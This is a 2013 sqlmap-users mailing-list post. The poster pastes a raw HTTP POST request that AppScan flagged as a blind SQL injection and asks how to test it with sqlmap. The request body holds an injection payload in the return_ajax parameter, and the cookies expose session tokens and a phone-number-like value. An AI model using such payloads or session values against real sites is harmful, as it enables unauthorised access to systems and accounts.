method is post, but url have parameter
following is data:
**********************
POST /xxx/space.php?appname=feed&mod=home&act=ta HTTP/1.1
Content-Type: application/x-www-form-urlencoded; charset=utf-8
Accept: text/html, */*; q=0.01
X-Requested-With: XMLHttpRequest
Cookie: CmProvid=js; 
WT_FPC=id=2f4d851c821d27374a01382214200665:lv=1382216859228:ss=1382214200665; 
CmProvid=js; 
WT_FPC=id=2f4d851c821d27374a01382214200665:lv=1382216859228:ss=1382214200665; 
fpyUjfj0NP=MDAwM2IyYTg2ZjAwMDAwMDAwMjEwLVVsPSExMzgyMjQ1NjM0; 
iA2Ks3ygK8=FG85q78Y1WGD; PHPSESSID=j60jb48nmubdirfbcmjdfib6o0; 
JSESSIONID=ZcHJSv0Gh2xLyfTrhMHV8bDMjTkLHgPtkyvYmg2n3LPkHpPL09zT!-747763825; 
mzone_loginuid=11388868; 
cmjsSSOCookie=ec9e1d93a3444957a19aa02ef712a...@js.ac.10086.cn; 
cmtokenid=ec9e1d93a3444957a19aa02ef712a...@js.ac.10086.cn; 
CmWebtokenid=13401541844,js
Accept-Language: en-US
Referer: http://www.xxx.com/xxx/space.php?do=hot
Host: www.xxx.com
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; Win64; x64; 
Trident/4.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; 
Media Center PC 6.0; Tablet PC 2.0)
Content-Length: 78

return_ajax=1%27+and+%27f%27%3D%27f%27%29+--+&act=add_attention&targetid=10086

*********************

the result of appscan is blind-sql-inject, how can I inject this url with 
sqlmap?
thanks.

2013-10-21



is2reg
------------------------------------------------------------------------------
October Webinars: Code for Performance
Free Intel webinars can help you accelerate application performance.
Explore tips for MPI, OpenMP, advanced profiling, and more. Get the most from 
the latest Intel processors and coprocessors. See abstracts and register >
http://pubads.g.doubleclick.net/gampad/clk?id=60135031&iu=/4140/ostg.clktrk
_______________________________________________
sqlmap-users mailing list
sqlmap-users@lists.sourceforge.net
https://lists.sourceforge.net/lists/listinfo/sqlmap-users

Reply via email to